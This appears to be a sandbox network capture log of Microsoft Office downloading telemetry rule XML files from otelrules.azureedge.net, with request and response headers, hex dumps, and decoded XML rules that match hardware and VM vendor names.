                      Session IDSource IPSource PortDestination IPDestination Port
                      76192.168.2.64979413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:57 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:57 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:57 GMT
                      Content-Type: text/xml
                      Content-Length: 502
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                      ETag: "0x8DC582BB6A0D312"
                      x-ms-request-id: 4680a0b7-201e-003c-6bc7-4330f9000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165157Z-174f7845968cpnpfhC1EWR3afc00000015rg00000000rm5s
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:57 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      77192.168.2.64979713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:59 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:59 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:59 GMT
                      Content-Type: text/xml
                      Content-Length: 408
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                      ETag: "0x8DC582BB9B6040B"
                      x-ms-request-id: 8abd9dd7-e01e-0099-194f-41da8a000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165159Z-174f7845968pght8hC1EWRyvxg00000009dg000000004ps4
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:59 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                      Session IDSource IPSource PortDestination IPDestination Port
                      78192.168.2.64979813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:59 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:59 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:59 GMT
                      Content-Type: text/xml
                      Content-Length: 469
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                      ETag: "0x8DC582BB3CAEBB8"
                      x-ms-request-id: d3508ca6-601e-003d-4e91-3f6f25000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165159Z-174f78459685m244hC1EWRgp2c000000160000000000k83s
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:59 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      79192.168.2.64979513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:59 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:59 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:59 GMT
                      Content-Type: text/xml
                      Content-Length: 407
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                      ETag: "0x8DC582B9D30478D"
                      x-ms-request-id: b6cdcd34-001e-0014-02c7-435151000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165159Z-174f7845968zgtf6hC1EWRqd8s0000000z3000000000q801
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:59 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                      Session IDSource IPSource PortDestination IPDestination Port
                      80192.168.2.64979613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:59 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:59 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:59 GMT
                      Content-Type: text/xml
                      Content-Length: 474
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                      ETag: "0x8DC582BB3F48DAE"
                      x-ms-request-id: 1fbe2e95-401e-0083-4bb4-43075c000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165159Z-174f7845968pght8hC1EWRyvxg000000098000000000u5cu
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:59 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      81192.168.2.64979913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:59 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:00 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:59 GMT
                      Content-Type: text/xml
                      Content-Length: 416
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                      ETag: "0x8DC582BB5284CCE"
                      x-ms-request-id: f7ef784b-001e-0066-274f-44561e000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165159Z-174f784596886s2bhC1EWR743w000000165000000000rf7k
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:00 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                      Session IDSource IPSource PortDestination IPDestination Port
                      82192.168.2.64980113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:01 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:01 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:01 GMT
                      Content-Type: text/xml
                      Content-Length: 432
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                      ETag: "0x8DC582BAABA2A10"
                      x-ms-request-id: b5b643f2-a01e-0021-77f9-44814c000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165201Z-174f78459685m244hC1EWRgp2c000000164g0000000021zm
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:01 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                      Session IDSource IPSource PortDestination IPDestination Port
                      83192.168.2.64980013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:01 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:01 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:01 GMT
                      Content-Type: text/xml
                      Content-Length: 472
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                      ETag: "0x8DC582B91EAD002"
                      x-ms-request-id: 18a648ed-001e-0049-1ef9-445bd5000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165201Z-174f7845968qj8jrhC1EWRh41s000000168g000000000t4d
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:01 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      84192.168.2.64980313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:01 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:01 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:01 GMT
                      Content-Type: text/xml
                      Content-Length: 427
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                      ETag: "0x8DC582BB464F255"
                      x-ms-request-id: 8aad1780-e01e-0020-7ed6-43de90000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165201Z-174f784596886s2bhC1EWR743w000000165g00000000qm3e
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:01 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                      Session IDSource IPSource PortDestination IPDestination Port
                      85192.168.2.64980213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:01 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:02 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:01 GMT
                      Content-Type: text/xml
                      Content-Length: 475
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                      ETag: "0x8DC582BBA740822"
                      x-ms-request-id: 07bbe555-e01e-0020-3c1f-45de90000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165201Z-174f7845968xr5c2hC1EWRd0hn0000000qzg00000000pxf2
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:02 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      86192.168.2.64980413.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:02 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:02 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:02 GMT
                      Content-Type: text/xml
                      Content-Length: 474
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                      ETag: "0x8DC582BA4037B0D"
                      x-ms-request-id: 89e8b03d-001e-0065-5291-3f0b73000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165202Z-174f7845968xr5c2hC1EWRd0hn0000000qy000000000uwzg
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:52:02 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      87192.168.2.64980513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:52:03 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:52:03 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:52:03 GMT
                      Content-Type: text/xml
                      Content-Length: 419
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                      ETag: "0x8DC582BA6CF78C8"
                      x-ms-request-id: 97ca64ed-201e-000c-5e6e-4379c4000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165203Z-174f7845968psccphC1EWRuz9s00000016h0000000004m3y
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
